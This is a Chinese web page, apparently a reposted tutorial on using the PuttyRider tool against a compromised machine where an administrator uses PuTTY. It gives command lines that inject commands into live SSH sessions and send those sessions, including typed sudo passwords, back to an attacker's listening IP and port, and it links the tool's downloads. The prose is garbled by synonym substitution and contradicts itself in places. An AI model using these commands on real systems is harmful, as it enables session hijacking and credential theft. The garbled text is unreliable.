|
|
|
联系客服020-83701501

Putty的噩梦——渗透工具PuttyRider使用心得分享

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
Putty的噩梦——渗入渗出东西PuttyRider操纵心得分享

咱们在入侵到一台主机的时候,时时会看到打点员的桌面会放着putty.exe,这阐明有很大的可能性打点员是操纵putty远程打点主机的。该东西首要是 针对SSH客户端putty的垄断,采纳DLL注入的举措,来实现种种慷慨的垄断姿势。我依次演示该东西的三种垄断场景

一.当你远程管束对方主机的时候,打点员正好用putty联接着远程主机

这种气象,咱们只有直接注入命令到以后的putty进程,便梗概垄断,特别简单,偏差是没有回显。

t01ce4f3afcf47b04d3.jpg

操纵puttyRider.exe –l 查看以掉队程中putty正在联接的远程主机新闻,这里不但能得到远程主机的IP地址和putty进程号,还能在Injected列看到以后是NO,阐明咱们尚无进程注入。

t01384d89895aa86a3c.jpg

我 们操纵puttyrider.exe –p 0 –f –c ifconfig,就把ifconfig命令注入到以后的putty会话了,就达到远程命令实验的目的了。再次puttyRider.exe –l 看一下,创造injected列是yes了,阐明咱们注入进程失利了。

t01aa1aa8be052a81f8.jpg

2.操纵反弹的举措及时看打点员的输出

除 了垄断第一种方法直接注入命令,咱们还梗概反弹出来,及时看到对方打点员在putty里的输出,纵然打点输出sudo这种命令,咱们也大概看到他输出的明 文明码。但是这种垄断的条件是,对方打点员正在用PUTTY联接的主机梗概反弹到你监听的IP地址,防火墙限定的不是很严。

t01a5e3207ba4897591.jpg

Puttyrider.exe –p 0 –r 我监听的IP:端口

实验后,咱们便梗概看到结果了

t0183fd6fe50fa2129d.jpg

3.我运气运限不这么好,对方打点员以后没有正在操纵PUTTY打点远程主机

这种情况理应最常见了,软件作者也思索到了,给咱们供给了-w参数,他会让puttyrider背景监督新起来的进程,此后反弹到咱们的主机,也能及时的看到对方的操纵哦,包括输出的账号

http://p2.qhimg.com/t01b10f9dd71aac0fe4.jpg

Puttyrider.exe –w –r 我监听的IP:端口号

当实验完这个命令后,只有打点员下次再次关闭PUTTY的时候,咱们就能在监听的9999端口看到她的SHELL了

/uploads/allimg/191029/1013413536-6.jpg

末了假设想研究东西细节的童鞋,梗概在

https://codeload.github.com/seastorm/PuttyRider/zip/master下载源码,深入深造 :)

编译好的二进制文件梗概在

https://github.com/seastorm/PuttyRider/releases/download/0.一/PuttyRider-bin.zip下载

[via@bobao3六0]

数安新闻+更多

证书相关+更多